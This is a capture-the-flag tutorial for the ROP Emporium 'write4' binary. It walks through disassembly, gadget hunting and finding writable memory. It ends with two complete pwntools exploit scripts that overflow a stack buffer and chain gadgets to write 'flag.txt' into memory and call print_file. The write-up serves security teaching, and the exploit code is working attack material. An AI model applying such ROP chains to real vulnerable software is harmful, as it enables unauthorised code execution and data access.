write4
Building write-what-where abilities to process new memory.
This is a challenging binary but teaches a lot about how ROP can produce some great results. We'll discuss the inspiration for why we decided to choose our attack vector, discuss why it's possible, and then build a supporting ROP chain. This challenge taught me to do ROP (shoutout LT King); I think it's a valuable challenge to learn from.
Attack Vector Inspiration
Running the binary proves to be pretty useless because none of the output is particularly helpful. Instead, we choose to do some static analysis and some gadget hunting to find what we need to beat this challenge.
When we open the binary in gdb / radare2, we notice that pwnme function is actually inside libwrite4.so, so we go there first. Checking the contents of pwnme in radare2:
gef➤ disas pwnme
Dump of assembler code for function pwnme:
0x00000000000008aa <+0>: push rbp
0x00000000000008ab <+1>: mov rbp,rsp
0x00000000000008ae <+4>: sub rsp,0x20
0x00000000000008b2 <+8>: mov rax,QWORD PTR [rip+0x200727] # 0x200fe0
0x00000000000008b9 <+15>: mov rax,QWORD PTR [rax]
0x00000000000008bc <+18>: mov ecx,0x0
0x00000000000008c1 <+23>: mov edx,0x2
0x00000000000008c6 <+28>: mov esi,0x0
0x00000000000008cb <+33>: mov rdi,rax
0x00000000000008ce <+36>: call 0x790 <setvbuf@plt>
0x00000000000008d3 <+41>: lea rdi,[rip+0x106] # 0x9e0
0x00000000000008da <+48>: call 0x730 <puts@plt>
0x00000000000008df <+53>: lea rdi,[rip+0x111] # 0x9f7
0x00000000000008e6 <+60>: call 0x730 <puts@plt>
0x00000000000008eb <+65>: lea rax,[rbp-0x20]
0x00000000000008ef <+69>: mov edx,0x20
0x00000000000008f4 <+74>: mov esi,0x0
0x00000000000008f9 <+79>: mov rdi,rax
0x00000000000008fc <+82>: call 0x760 <memset@plt>
0x0000000000000901 <+87>: lea rdi,[rip+0xf8] # 0xa00
0x0000000000000908 <+94>: call 0x730 <puts@plt>
0x000000000000090d <+99>: lea rdi,[rip+0x115] # 0xa29
0x0000000000000914 <+106>: mov eax,0x0
0x0000000000000919 <+111>: call 0x750 <printf@plt>
0x000000000000091e <+116>: lea rax,[rbp-0x20]
0x0000000000000922 <+120>: mov edx,0x200
0x0000000000000927 <+125>: mov rsi,rax
0x000000000000092a <+128>: mov edi,0x0
0x000000000000092f <+133>: call 0x770 <read@plt>
0x0000000000000934 <+138>: lea rdi,[rip+0xf1] # 0xa2c
0x000000000000093b <+145>: call 0x730 <puts@plt>
0x0000000000000940 <+150>: nop
0x0000000000000941 <+151>: leave
0x0000000000000942 <+152>: ret
End of assembler dump.[0x7f58ace007d0]> [email protected]
┌ 153: sym.pwnme ();
│ ; var int64_t var_20h @ rbp-0x20
│ 0x7f58ace008aa 55 push rbp
│ 0x7f58ace008ab 4889e5 mov rbp, rsp
│ 0x7f58ace008ae 4883ec20 sub rsp, 0x20
│ 0x7f58ace008b2 488b05270720. mov rax, qword [reloc.stdout] ; [0x7f58ad000fe0:8]=0
│ 0x7f58ace008b9 488b00 mov rax, qword [rax]
│ 0x7f58ace008bc b900000000 mov ecx, 0
│ 0x7f58ace008c1 ba02000000 mov edx, 2
│ 0x7f58ace008c6 be00000000 mov esi, 0
│ 0x7f58ace008cb 4889c7 mov rdi, rax
│ 0x7f58ace008ce e8bdfeffff call sym.imp.setvbuf ; int setvbuf(FILE*stream, char *buf, int mode, size_t size)
│ 0x7f58ace008d3 488d3d060100. lea rdi, str.write4_by_ROP_Emporium ; sym..rodata
│ ; 0x7f58ace009e0 ; "write4 by ROP Emporium"
│ 0x7f58ace008da e851feffff call sym.imp.puts ; int puts(const char *s)
│ 0x7f58ace008df 488d3d110100. lea rdi, str.x86_64_n ; 0x7f58ace009f7 ; "x86_64\n"
│ 0x7f58ace008e6 e845feffff call sym.imp.puts ; int puts(const char *s)
│ 0x7f58ace008eb 488d45e0 lea rax, [var_20h]
│ 0x7f58ace008ef ba20000000 mov edx, 0x20 ; 32
│ 0x7f58ace008f4 be00000000 mov esi, 0
│ 0x7f58ace008f9 4889c7 mov rdi, rax
│ 0x7f58ace008fc e85ffeffff call sym.imp.memset ; void *memset(void *s, int c, size_t n)
│ 0x7f58ace00901 488d3df80000. lea rdi, str.Go_ahead_and_give_me_the_input_already__n ; 0x7f58ace00a00 ; "Go ahead and give me the input already!\n"
│ 0x7f58ace00908 e823feffff call sym.imp.puts ; int puts(const char *s)
│ 0x7f58ace0090d 488d3d150100. lea rdi, [0x7f58ace00a29] ; "> "
│ 0x7f58ace00914 b800000000 mov eax, 0
│ 0x7f58ace00919 e832feffff call sym.imp.printf ; int printf(const char *format)
│ 0x7f58ace0091e 488d45e0 lea rax, [var_20h]
│ 0x7f58ace00922 ba00020000 mov edx, 0x200 ; rflags
│ 0x7f58ace00927 4889c6 mov rsi, rax
│ 0x7f58ace0092a bf00000000 mov edi, 0
│ 0x7f58ace0092f e83cfeffff call sym.imp.read ; ssize_t read(int fildes, void *buf, size_t nbyte)
│ 0x7f58ace00934 488d3df10000. lea rdi, str.Thank_you_ ; 0x7f58ace00a2c ; "Thank you!"
│ 0x7f58ace0093b e8f0fdffff call sym.imp.puts ; int puts(const char *s)
│ 0x7f58ace00940 90 nop
│ 0x7f58ace00941 c9 leave
└ 0x7f58ace00942 c3 retThe reason that I like radare2 for static analysis is that it provides function headers and resolves strings automatically. This makes the disassembly process a lot easier. I personally think that gdb has better stepping usability for dynamic analysis but is less feature-friendly for static analysis.
From this function, we notice that we're allowed a 0x200 byte payload to be read on the stack. It is being read to rbp-0x20 so we can quickly deduce it takes 0x28=40 bytes to reach the return pointer. Then, the rest is up to us.
Searching around the binary, we find the function print_file:
gef➤ disas print_file
Dump of assembler code for function print_file:
0x0000000000000943 <+0>: push rbp
0x0000000000000944 <+1>: mov rbp,rsp
0x0000000000000947 <+4>: sub rsp,0x40
0x000000000000094b <+8>: mov QWORD PTR [rbp-0x38],rdi
0x000000000000094f <+12>: mov QWORD PTR [rbp-0x8],0x0
0x0000000000000957 <+20>: mov rax,QWORD PTR [rbp-0x38]
0x000000000000095b <+24>: lea rsi,[rip+0xd5] # 0xa37
0x0000000000000962 <+31>: mov rdi,rax
0x0000000000000965 <+34>: call 0x7a0 <fopen@plt>
0x000000000000096a <+39>: mov QWORD PTR [rbp-0x8],rax
0x000000000000096e <+43>: cmp QWORD PTR [rbp-0x8],0x0
0x0000000000000973 <+48>: jne 0x997 <print_file+84>
0x0000000000000975 <+50>: mov rax,QWORD PTR [rbp-0x38]
0x0000000000000979 <+54>: mov rsi,rax
0x000000000000097c <+57>: lea rdi,[rip+0xb6] # 0xa39
0x0000000000000983 <+64>: mov eax,0x0
0x0000000000000988 <+69>: call 0x750 <printf@plt>
0x000000000000098d <+74>: mov edi,0x1
0x0000000000000992 <+79>: call 0x7b0 <exit@plt>
0x0000000000000997 <+84>: mov rdx,QWORD PTR [rbp-0x8]
0x000000000000099b <+88>: lea rax,[rbp-0x30]
0x000000000000099f <+92>: mov esi,0x21
0x00000000000009a4 <+97>: mov rdi,rax
0x00000000000009a7 <+100>: call 0x780 <fgets@plt>
0x00000000000009ac <+105>: lea rax,[rbp-0x30]
0x00000000000009b0 <+109>: mov rdi,rax
0x00000000000009b3 <+112>: call 0x730 <puts@plt>
0x00000000000009b8 <+117>: mov rax,QWORD PTR [rbp-0x8]
0x00000000000009bc <+121>: mov rdi,rax
0x00000000000009bf <+124>: call 0x740 <fclose@plt>
0x00000000000009c4 <+129>: mov QWORD PTR [rbp-0x8],0x0
0x00000000000009cc <+137>: nop
0x00000000000009cd <+138>: leave
0x00000000000009ce <+139>: ret
End of assembler dump.┌ 140: sym.print_file (int64_t arg1);
│ ; arg int64_t arg1 @ rdi
│ ; var int64_t var_8h @ rbp-0x8
│ ; var int64_t var_30h @ rbp-0x30
│ ; var int64_t var_38h @ rbp-0x38
│ 0x7f30ac200943 55 push rbp
│ 0x7f30ac200944 4889e5 mov rbp, rsp
│ 0x7f30ac200947 4883ec40 sub rsp, 0x40
│ 0x7f30ac20094b 48897dc8 mov qword [var_38h], rdi ; arg1
│ 0x7f30ac20094f 48c745f80000. mov qword [var_8h], 0
│ 0x7f30ac200957 488b45c8 mov rax, qword [var_38h]
│ 0x7f30ac20095b 488d35d50000. lea rsi, [0x7f30ac200a37] ; "r"
│ 0x7f30ac200962 4889c7 mov rdi, rax
│ 0x7f30ac200965 e836feffff call sym.imp.fopen ; file*fopen(const char *filename, const char *mode)
│ 0x7f30ac20096a 488945f8 mov qword [var_8h], rax
│ 0x7f30ac20096e 48837df800 cmp qword [var_8h], 0
│ ┌─< 0x7f30ac200973 7522 jne 0x7f30ac200997
│ │ 0x7f30ac200975 488b45c8 mov rax, qword [var_38h]
│ │ 0x7f30ac200979 4889c6 mov rsi, rax
│ │ 0x7f30ac20097c 488d3db60000. lea rdi, str.Failed_to_open_file:__s_n ; 0x7f30ac200a39 ; "Failed to open file: %s\n"
│ │ 0x7f30ac200983 b800000000 mov eax, 0
│ │ 0x7f30ac200988 e8c3fdffff call sym.imp.printf ; int printf(const char *format)
│ │ 0x7f30ac20098d bf01000000 mov edi, 1
│ │ 0x7f30ac200992 e819feffff call sym.imp.exit ; void exit(int status)
│ │ ; CODE XREF from sym.print_file @ 0x7f30ac200973(x)
│ └─> 0x7f30ac200997 488b55f8 mov rdx, qword [var_8h]
│ 0x7f30ac20099b 488d45d0 lea rax, [var_30h]
│ 0x7f30ac20099f be21000000 mov esi, 0x21 ; '!' ; 33
│ 0x7f30ac2009a4 4889c7 mov rdi, rax
│ 0x7f30ac2009a7 e8d4fdffff call sym.imp.fgets ; char *fgets(char *s, int size, FILE *stream)
│ 0x7f30ac2009ac 488d45d0 lea rax, [var_30h]
│ 0x7f30ac2009b0 4889c7 mov rdi, rax
│ 0x7f30ac2009b3 e878fdffff call sym.imp.puts ; int puts(const char *s)
│ 0x7f30ac2009b8 488b45f8 mov rax, qword [var_8h]
│ 0x7f30ac2009bc 4889c7 mov rdi, rax
│ 0x7f30ac2009bf e87cfdffff call sym.imp.fclose ; int fclose(FILE *stream)
│ 0x7f30ac2009c4 48c745f80000. mov qword [var_8h], 0
│ 0x7f30ac2009cc 90 nop
│ 0x7f30ac2009cd c9 leave
└ 0x7f30ac2009ce c3 retBased on the C code provided, this binary takes an int64_t, resolves the string at that address, then prints the file's contents with that name. This means that we need to find the address of flag.txt in memory and then pass this address into print_file, and we'll have the flag!
Building the ROP Chain
The first step you should take is to find the flag in memory. strings write4 | grep flag tells us it's not there. Bummer. Can we introduce it into the binary somehow?
Our next step should be to check the gadgets to see if there's a way to pass data into memory. We need a way to store the string flag.txt at an address of our choice and then pass that address into print_file. Let's look around ROPgadget for some pop gadgets:
$ ROPgadget --binary write4 --only "pop|ret"
Gadgets information
============================================================
0x000000000040068c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040068e : pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400690 : pop r14 ; pop r15 ; ret
0x0000000000400692 : pop r15 ; ret
0x000000000040068b : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040068f : pop rbp ; pop r14 ; pop r15 ; ret
0x0000000000400588 : pop rbp ; ret
0x0000000000400693 : pop rdi ; ret
0x0000000000400691 : pop rsi ; pop r15 ; ret
0x000000000040068d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004004e6 : ret$ ropper --file write4 --search "pop|ret"
[INFO] Load gadgets for section: LOAD
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
[INFO] Searching for gadgets: pop|ret
[INFO] File: write4
0x000000000040068c: pop r12; pop r13; pop r14; pop r15; ret;
0x000000000040068e: pop r13; pop r14; pop r15; ret;
0x0000000000400690: pop r14; pop r15; ret;
0x0000000000400692: pop r15; ret;
0x000000000040057b: pop rbp; mov edi, 0x601038; jmp rax;
0x000000000040068b: pop rbp; pop r12; pop r13; pop r14; pop r15; ret;
0x000000000040068f: pop rbp; pop r14; pop r15; ret;
0x0000000000400588: pop rbp; ret;
0x0000000000400693: pop rdi; ret;
0x0000000000400691: pop rsi; pop r15; ret;
0x000000000040068d: pop rsp; pop r13; pop r14; pop r15; ret;
0x00000000004004e6: ret; This seems useful enough. This provides us a way to load the first two parameter registers, meaning that we can pass an address into print_file. We know that the end of our payload will look something like:
payload += p64(pop_rdi)
payload += p64(flag_address)
payload += p64(f_printfile)Now, we need a way to store flag.txt somewhere. We'll check for a mov gadget that moves a string to the *contents of an address. Something like this might be helpful:
MOV QWORD PTR [register_1], register_2This would let us put flag.txt in register_2, and then store it at the value of register_1. We would also need to control register_1 to make this happen.
Let's check ROPgadget for some options:
$ ROPgadget --binary write4 --only "mov|pop|ret"
Gadgets information
============================================================
0x00000000004005e2 : mov byte ptr [rip + 0x200a4f], 1 ; pop rbp ; ret
0x0000000000400629 : mov dword ptr [rsi], edi ; ret
0x0000000000400610 : mov eax, 0 ; pop rbp ; ret
0x0000000000400628 : mov qword ptr [r14], r15 ; ret
0x000000000040068c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040068e : pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400690 : pop r14 ; pop r15 ; ret
0x0000000000400692 : pop r15 ; ret
0x000000000040068b : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040068f : pop rbp ; pop r14 ; pop r15 ; ret
0x0000000000400588 : pop rbp ; ret
0x0000000000400693 : pop rdi ; ret
0x0000000000400691 : pop rsi ; pop r15 ; ret
0x000000000040068d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004004e6 : ret
Unique gadgets found: 15$ ropper --file write4 --search "mov|pop|ret"
[INFO] Load gadgets from cache
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
[INFO] Searching for gadgets: mov|pop|ret
[INFO] File: write4
0x00000000004005e2: mov byte ptr [rip + 0x200a4f], 1; pop rbp; ret;
0x0000000000400606: mov dword ptr [rbp + 0x48], edx; mov ebp, esp; call 0x500; mov eax, 0; pop rbp; ret;
0x0000000000400629: mov dword ptr [rsi], edi; ret;
0x0000000000400610: mov eax, 0; pop rbp; ret;
0x00000000004004d5: mov eax, dword ptr [rip + 0x200b1d]; test rax, rax; je 0x4e2; call rax;
0x00000000004004d5: mov eax, dword ptr [rip + 0x200b1d]; test rax, rax; je 0x4e2; call rax; add rsp, 8; ret;
0x0000000000400609: mov ebp, esp; call 0x500; mov eax, 0; pop rbp; ret;
0x00000000004005db: mov ebp, esp; call 0x560; mov byte ptr [rip + 0x200a4f], 1; pop rbp; ret;
0x0000000000400619: mov ebp, esp; mov edi, 0x4006b4; call 0x510; nop; pop rbp; ret;
0x000000000040061b: mov edi, 0x4006b4; call 0x510; nop; pop rbp; ret;
0x000000000040057c: mov edi, 0x601038; jmp rax;
0x0000000000400628: mov qword ptr [r14], r15; ret;
0x00000000004004d4: mov rax, qword ptr [rip + 0x200b1d]; test rax, rax; je 0x4e2; call rax;
0x00000000004004d4: mov rax, qword ptr [rip + 0x200b1d]; test rax, rax; je 0x4e2; call rax; add rsp, 8; ret;
0x0000000000400608: mov rbp, rsp; call 0x500; mov eax, 0; pop rbp; ret;
0x00000000004005da: mov rbp, rsp; call 0x560; mov byte ptr [rip + 0x200a4f], 1; pop rbp; ret;
0x0000000000400618: mov rbp, rsp; mov edi, 0x4006b4; call 0x510; nop; pop rbp; ret;
0x000000000040068c: pop r12; pop r13; pop r14; pop r15; ret;
0x000000000040068e: pop r13; pop r14; pop r15; ret;
0x0000000000400690: pop r14; pop r15; ret;
0x0000000000400692: pop r15; ret;
0x000000000040057b: pop rbp; mov edi, 0x601038; jmp rax;
0x000000000040068b: pop rbp; pop r12; pop r13; pop r14; pop r15; ret;
0x000000000040068f: pop rbp; pop r14; pop r15; ret;
0x0000000000400588: pop rbp; ret;
0x0000000000400693: pop rdi; ret;
0x0000000000400691: pop rsi; pop r15; ret;
0x000000000040068d: pop rsp; pop r13; pop r14; pop r15; ret;
0x00000000004004e6: ret; We find the following gadget which suits our needs:
0x0000000000400628 : mov qword ptr [r14], r15 ; retThis gadget lets us write the contents of r15 at the location pointed to by r14. We can use this to write flag.txt to an address of our choice. We'll need to control r14 and r15 to make this happen.
We'll go back and take note of the following gadget, which lets us control r14 and r15:
0x0000000000400690 : pop r14 ; pop r15 ; retIn this case, we'll load r14 with the address to write to and r15 with the string to write.
Deciding Where to Write
Now, we need to figure out where we want to write. This is a crucial step because we don't want to overwrite crucial memory that forces our program to crash. Another essential check is ensuring we can write to the address we choose. Not every memory section has write permissions, so we must find somewhere we are allowed to write.
We can check the mappings inside gdb and find a writeable location:
gef➤ info proc mappings
process 54986
Mapped address spaces:
Start Addr End Addr Size Offset Perms objfile
0x400000 0x401000 0x1000 0x0 r-xp /home/joybuzzer/Documents/vunrotc/public/binex/05-rop/write4/src/write4
0x600000 0x601000 0x1000 0x0 r--p /home/joybuzzer/Documents/vunrotc/public/binex/05-rop/write4/src/write4
0x601000 0x602000 0x1000 0x1000 rw-p /home/joybuzzer/Documents/vunrotc/public/binex/05-rop/write4/src/write4[0x7f8048c7c290]> dm
0x0000000000400000 - 0x0000000000401000 - usr 4K s r-x /home/joybuzzer/write4 /home/joybuzzer/write4 ; map._home_joybuzzer_write4.r_x
0x0000000000600000 - 0x0000000000602000 - usr 8K s rw- /home/joybuzzer/write4 /home/joybuzzer/write4 ; map._home_joybuzzer_write4.rw_
0x00007f8048c5c000 - 0x00007f8048c5e000 - usr 8K s r-- /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2
0x00007f8048c5e000 - 0x00007f8048c88000 * usr 168K s r-x /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 ; map._usr_lib_x86_64_linux_gnu_ld_linux_x86_64.so.2.r_x
0x00007f8048c88000 - 0x00007f8048c93000 - usr 44K s r-- /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 ; map._usr_lib_x86_64_linux_gnu_ld_linux_x86_64.so.2.r__
0x00007f8048c94000 - 0x00007f8048c98000 - usr 16K s rw- /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 ; map._usr_lib_x86_64_linux_gnu_ld_linux_x86_64.so.2.rw_
0x00007ffe793f6000 - 0x00007ffe79417000 - usr 132K s rw- [stack] [stack] ; map._stack_.rw_
0x00007ffe7948c000 - 0x00007ffe79490000 - usr 16K s r-- [vvar] [vvar] ; map._vvar_.r__
0x00007ffe79490000 - 0x00007ffe79492000 - usr 8K s r-x [vdso] [vdso] ; map._vdso_.r_x
0xffffffffff600000 - 0xffffffffff601000 - usr 4K s --x [vsyscall] [vsyscall] ; map._vsyscall_.__xWe see that the 0x601000-0x602000 range is the only writeable range, so let's check around in there. We're looking for memory that's hopefully not used.
gef➤ x/20gx 0x601000
0x601000: 0x0000000000600e00 0x00007ffff7ffe2e0
0x601010: 0x00007ffff7fd8d30 0x0000000000400506
0x601020 <[email protected]>: 0x0000000000400516 0x0000000000000000
0x601030: 0x0000000000000000 0x0000000000000000
0x601040: 0x0000000000000000 0x0000000000000000
0x601050: 0x0000000000000000 0x0000000000000000
0x601060: 0x0000000000000000 0x0000000000000000
0x601070: 0x0000000000000000 0x0000000000000000
0x601080: 0x0000000000000000 0x0000000000000000
0x601090: 0x0000000000000000 0x0000000000000000[0x7f8048c7c290]> pxw 160 @ 0x601000
0x00601000 0x00600e00 0x00000000 0x00000000 0x00000000 ..`.............
0x00601010 0x00000000 0x00000000 0x00400506 0x00000000 ..........@.....
0x00601020 0x00400516 0x00000000 0x00000000 0x00000000 ..@.............
0x00601030 0x00000000 0x00000000 0x00000000 0x00000000 ................
0x00601040 0x00000000 0x00000000 0x00000000 0x00000000 ................
0x00601050 0x00000000 0x00000000 0x00000000 0x00000000 ................
0x00601060 0x00000000 0x00000000 0x00000000 0x00000000 ................
0x00601070 0x00000000 0x00000000 0x00000000 0x00000000 ................
0x00601080 0x00000000 0x00000000 0x00000000 0x00000000 ................
0x00601090 0x00000000 0x00000000 0x00000000 0x00000000 ................We see that 0x601030 doesn't seem to be used by anything, so we'll choose there. We could play it safer and choose something further away, but in this case, we'll see it doesn't matter.
If you're writing your exploit and finding that your data doesn't seem to be writing to memory, or that your program is crashing, it's likely that you're writing to a location that's used. Try to find a different location.
Writing the Exploit
Now, let's put this all together. We'll start by defining the binary, library, and the process:
elf = context.binary = ELF('./write4')
libc = ELF('./libwrite4.so')
proc = remote('vunrotc.cole-ellis.com', 5400)Then, we'll define all our essentials. The functions, variables, addresses, and gadgets:
# functions
f_printfile = 0x400510
# addresses
a_writeLocation = 0x601030 # write location to build "flag.txt"
# gadgets
g_popR14R15 = 0x400690 # pop r14 ; pop r15 ; ret
g_writeR15AtR14 = 0x400628 # mov qword ptr [r14], r15 ; ret
g_popRdi = 0x400693 # pop rdi; ret;
g_ret = 0x400589 # ret;Then, we'll build the chain.
# align the stack
ropChain += p64(g_ret)
# write flag.txt to string
ropChain += p64(g_popR14R15)
ropChain += p64(a_writeLocation)
ropChain += b'flag.txt'
ropChain += p64(g_writeR15AtR14)
# call print_file with string address
ropChain += p64(g_popRdi)
ropChain += p64(a_writeLocation)
ropChain += p64(f_printfile)Finally, we'll send the payload and get the flag:
(proc.readuntil(b'> '))
proc.send(padding + ropChain)
proc.interactive()This works! This gets us the flag.
If we want to make our exploit more robust...
We would need to ensure that the string is null-terminated. In the case that the data block after the one we chose gets used, we would need to ensure that the flag.txt string is null-terminated.
To do this, we can add the following before the call to print_file:
# write null byte to end of string
ropChain += p64(g_popR14R15)
ropChain += p64(a_writeLocation + 0x8)
ropChain += p64(0x0)
ropChain += p64(g_writeR15AtR14)This would ensure that our string is null-terminated, and that our code works.
Alternative Solution
This is the solution I mentioned earlier. This solution uses the following gadget:
0x0000000000400629 : mov dword ptr [rsi], edi ; retThis means we need to control rsi and edi. We'll use the following gadgets to do this:
0x0000000000400691 : pop rsi ; pop r15 ; ret
0x0000000000400693 : pop rdi ; retNotice that our gadget pops rdi, but uses edi to move into memory. This means that we can only move 4 bytes at a time (since edi is the lower four bytes of rdi). From here, our chain would do the following:
Align the stack
Move flag into
addr(the address we write to)Move .txt into
addr+4Move a null byte into
addr+8Call
print_filewithaddras the argument
This is a bit more complicated, but it works just as well. Note that we use b'C' * 0x8 as a junk variable. I chose this for debugging purposes because it differentiates from the padding. We use v_junk to populate r15 every time we use the pop rsi gadget.
Here is that exploit:
from pwn import *
elf = context.binary = ELF('./write4')
libc = ELF('./libwrite4.so')
proc = remote('vunrotc.cole-ellis.com', 5400)
# functions
f_printfile = 0x400510
# variables and addresses
v_junk = 0x4343434343434343
a_writeLocation = 0x601030 # write location to build "flag.txt"
# gadgets
g_writeEdiAtRsi = 0x400629 # mov dword ptr [rsi], edi; ret;
g_popRdi = 0x400693 # pop rdi; ret;
g_popRsiR15 = 0x400691 # pop rsi; pop r15; ret;
g_ret = 0x400589 # ret;
padding = b'A' * 40
ropChain = b''
# align the stack
ropChain += p64(g_ret)
# write flag to string
ropChain += p64(g_popRsiR15)
ropChain += p64(a_writeLocation);
ropChain += p64(v_junk);
ropChain += p64(g_popRdi);
ropChain += b'flagAAAA'
ropChain += p64(g_writeEdiAtRsi);
# add .txt to end of string
ropChain += p64(g_popRsiR15);
ropChain += p64(a_writeLocation + 4);
ropChain += p64(v_junk);
ropChain += p64(g_popRdi);
ropChain += b'.txtAAAA'
ropChain += p64(g_writeEdiAtRsi);
# add null byte to end of string
ropChain += p64(g_popRsiR15);
ropChain += p64(a_writeLocation + 8);
ropChain += p64(v_junk);
ropChain += p64(g_popRdi);
ropChain += b'\x00AAAAAAA'
ropChain += p64(g_writeEdiAtRsi);
# call print_file with string address
ropChain += p64(g_popRdi);
ropChain += p64(a_writeLocation);
ropChain += p64(f_printfile);
print(proc.readuntil(b'> '))
proc.send(padding + ropChain)
proc.interactive()Last updated
Was this helpful?